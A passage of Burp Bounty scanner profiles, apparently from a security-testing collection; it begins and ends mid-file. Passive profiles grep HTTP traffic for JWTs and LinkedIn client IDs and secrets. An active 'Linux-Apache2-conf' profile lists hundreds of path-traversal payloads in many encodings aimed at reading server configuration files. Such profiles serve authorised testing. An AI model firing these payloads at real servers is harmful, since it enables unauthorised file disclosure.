"CharsToUrlEncode": "",
"Grep": [
"true,,All Request,Name,[\u003d ]eyJ[A-Za-z0-9_\\/+-]*\\.[A-Za-z0-9._\\/+-]*"
],
"Tags": [
"JWT",
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": true,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 0,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "JWT-Detected",
"IssueSeverity": "Information",
"IssueConfidence": "Firm",
"IssueDetail": "JWT Detected: \u003cbr\u003e\u003cgrep\u003e",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/JWT.bb | [
{
"ProfileName": "JWT",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@six2dez1",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,^(ey[A-Za-z0-9_-]*\\.[A-Za-z0-9._-]*|ey[A-Za-z0-9_\\/+-]*\\.[A-Za-z0-9._\\/+-]*)",
"true,Or,[^a-zA-Z0-9](ey[A-Za-z0-9_-]*\\.[A-Za-z0-9._-]*|ey[A-Za-z0-9_\\/+-]*\\.[A-Za-z0-9._\\/+-]*)"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": true,
"ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
"HttpResponseCode": "",
"NegativeCT": true,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "JWT",
"IssueSeverity": "Information",
"IssueConfidence": "Certain",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/LinkedIn_Client_ID.bb | [
{
"ProfileName": "LinkedIn_Client_ID",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@six2dez1",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,(?i)linkedin(.{0,20})?(?-i)[\u0027\\\"][0-9a-z]{12}[\u0027\\\"]"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": true,
"ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
"HttpResponseCode": "",
"NegativeCT": true,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "LinkedIn Client Id",
"IssueSeverity": "Information",
"IssueConfidence": "Certain",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/LinkedIn_Secret.bb | [
{
"ProfileName": "LinkedIn_Secret",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@six2dez1",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,(?i)linkedin(.{0,20})?[\u0027\\\"][0-9a-z]{16}[\u0027\\\"]"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": true,
"ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
"HttpResponseCode": "",
"NegativeCT": true,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "LinkedIn Secret",
"IssueSeverity": "Information",
"IssueConfidence": "Certain",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/Linux-Apache2-conf.bb | [
{
"ProfileName": "Linux-Apache2-conf",
"Name": "",
"Enabled": true,
"Scanner": 1,
"Author": "@Sy3Omda",
"Payloads": [
"true,../{FILE}",
"true,../../{FILE}",
"true,../../../{FILE}",
"true,../../../../{FILE}",
"true,../../../../../{FILE}",
"true,../../../../../../{FILE}",
"true,../../../../../../../{FILE}",
"true,../../../../../../../../{FILE}",
"true,..%2f{FILE}",
"true,..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,..%252f{FILE}",
"true,..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,..\\{FILE}",
"true,..\\..\\{FILE}",
"true,..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..%255c{FILE}",
"true,..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,..%c0%af{FILE}",
"true,..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
"true,%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,..%%32%66{FILE}",
"true,..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
